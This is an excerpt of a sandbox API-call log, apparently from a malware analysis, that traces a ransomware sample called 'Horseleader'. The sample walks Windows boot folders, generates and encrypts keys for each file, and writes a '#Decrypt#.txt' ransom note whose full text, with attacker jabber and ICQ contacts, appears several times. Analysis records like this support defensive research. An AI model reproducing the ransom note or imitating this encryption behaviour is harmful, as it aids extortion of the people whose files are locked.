ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.008] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0125.008] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.008] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.008] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.009] lstrlenW (lpString=".testttjffg") returned 11 [0125.009] StrStrW (lpFirst="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.009] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.009] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.010] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\#Decrypt#.txt") returned 31 [0125.010] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\#Decrypt#.txt" (normalized: "c:\\boot\\tr-tr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.010] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.010] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.012] lstrlenA (lpString="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") returned 1368 [0125.012] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.012] CloseHandle (hObject=0x1dc) returned 1 [0125.013] GetProcessHeap () returned 0x780000 [0125.013] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.013] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0125.013] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0125.013] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0125.013] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0125.014] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0125.014] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-CN", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.014] GetProcessHeap () returned 0x780000 [0125.014] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.014] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0125.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.015] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0125.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.015] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.015] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0125.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0125.016] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.016] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.016] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0125.016] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.016] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.016] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.016] lstrlenW (lpString=".testttjffg") returned 11 [0125.016] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.016] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.017] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.017] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.042] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.043] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.043] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\#Decrypt#.txt") returned 31 [0125.043] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-cn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.044] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0125.044] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.046] lstrlenA (lpString="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") returned 1368 [0125.046] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.047] CloseHandle (hObject=0x1dc) returned 1 [0125.047] GetProcessHeap () returned 0x780000 [0125.047] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.047] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0125.047] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0125.047] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0125.048] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0125.048] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0125.048] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.048] GetProcessHeap () returned 0x780000 [0125.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.048] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0125.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.049] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0125.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.049] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.049] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0125.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.049] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.049] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.050] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0125.050] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.050] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.050] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.050] lstrlenW (lpString=".testttjffg") returned 11 [0125.050] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.051] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.051] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.051] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.051] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\#Decrypt#.txt") returned 31 [0125.051] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-hk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.052] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.052] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.053] lstrlenA (lpString="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") returned 1368 [0125.053] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.054] CloseHandle (hObject=0x1dc) returned 1 [0125.054] GetProcessHeap () returned 0x780000 [0125.054] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.054] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0125.054] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0125.054] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0125.054] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0125.055] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0125.055] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-TW", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.055] GetProcessHeap () returned 0x780000 [0125.055] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.055] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0125.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.056] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0125.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.056] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.057] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0125.057] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0125.057] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.057] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0125.057] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.058] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.058] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.058] lstrlenW (lpString=".testttjffg") returned 11 [0125.058] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.058] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.059] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, 
